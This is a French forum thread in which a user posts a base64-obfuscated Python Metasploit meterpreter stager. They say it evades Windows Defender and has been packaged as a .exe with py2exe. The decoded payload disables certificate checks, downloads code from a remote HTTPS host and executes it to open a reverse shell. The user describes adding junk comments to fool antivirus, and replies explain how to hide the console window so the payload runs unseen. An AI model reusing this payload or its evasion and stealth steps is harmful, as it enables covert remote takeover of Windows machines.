Bonjour,

Je m'entraine à du éthical hacking sur mes machines virtuelles,  j'ai voulu faire un payload .py que je convertis en .exe . Il marche et contourne windows defender. Mais une fois sur windows le .exe lancé une fenetre de comande se lance et ne s'interrompt pas ( https://ibb.co/qNZM5mm https://ibb.co/3cZS0vy https://ibb.co/8Nd4XKm ) . Elle reste affichée en plein centre de la page et si je la ferme la reverse connection meterpreter s'arrete .
Comment coder le .py ou .exe de manière à ce que la fenetres cmd terminal de windows se ferme au bout de 2 secondes ? voici le .exe et .py

le payload en .py ci dessous :

exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHpsaWIsYmFzZTY0LHN5cwojLy8ibmlrZSB0YSBtZXJhIgp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAojLy8ibmlrZSB0YSBtZXJhIgoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKIy8vIm5pa2UgdGEgZXpldHJldHRydGVybWVyYSIKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCiMvLyJuaWtlIHRhIGV6ZXRyZXR0cnRlcm1lcmEiCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6OTcuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC85Ny4wJyldCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoby5vcGVuKCdodHRwczovLzE5Mi4xNjguMi44MDo0NDMvX0RfNklndEJIdEMtRTZzSDNUdFRNZ2NyWGY2RERfVHFneUVnTCcpLnJlYWQoKSkpKQo=')[0])

le payload en .exe https://we.tl/t-aHI5ZMgVtT

Pourquoi le code est obfusqué ? À cause des insultes en commentaire ? C'est pas très éthique ça...

Bref pour aider il faudrait savoir comment est convertie le code Python en .exe. Pyinstaller ? Nuitka ? Cython ? etc. Ensuite il faut lire la doc pour savoir comment avoir un exécutable Windows en mode graphique (sans la console).

Pseudopgm a écrit:

Pourquoi le code est obfusqué ? À cause des insultes en commentaire ? C'est pas très éthique ça...

Bref pour aider il faudrait savoir comment est convertie le code Python en .exe. Pyinstaller ? Nuitka ? Cython ? etc. Ensuite il faut lire la doc pour savoir comment avoir un exécutable Windows en mode graphique (sans la console).

Quand tu dis obfuské tu veux dire qu'il est en base 64 puis décodé en python utf8 ? oui c'est metasploit de kali linux qui fait ca automatiquement... j'imagine que c'est pour tester les failles des anti virus ?

Oui j'ai mis n'importe quoi en comm pour tenter de brouiller l'anti virus de windows...

Quel doc ? j'ai suivis ce tuto Antivirus Evasion with Python. Summary | by Marcelo Sacchetin | InfoSec Write-ups (infosecwriteups.com)  et j'ai donc utilisé "Py2exe "  avec la commande "python.exe .\setup.py py2exe"   .

le setup.py est composé de ce code : 

"

-
Edité par DddDddds 3 octobre 2022 à 18:01:13

EDIT : umfred a écrit:

a priori (https://stackoverflow.com/questions/3275293/hiding-console-window-of-python-gui-app-with-py2exe), en remplaçant console par windows dans le script de py2exe ça devrait marcher (même si l'appli de base n'a pas de GUI)

super ca a marché merci beaucoup

Merci encore pour vos réponses les gars.

umfred a écrit:

bah le programme exécute le code de la charge, si la charge ne se ferme pas, pas de raison que le programme final se ferme.

Je suis vraiment nul en programmation (je connais un peu mieux le système et reseaux) je vois que dans le code il décode le base 64 puis execute le code python cette fois ci écrit en langage humain.

Mais y a pas un moyen que cette fenêtre soit au moins masqué.

umfred a écrit:

a priori (https://stackoverflow.com/questions/3275293/hiding-console-window-of-python-gui-app-with-py2exe), en remplaçant console par windows dans le script de py2exe ça devrait marcher (même si l'appli de base n'a pas de GUI)

Merci je vais essayer donc en remplacant  "

-
Edité par DddDddds 3 octobre 2022 à 21:01:05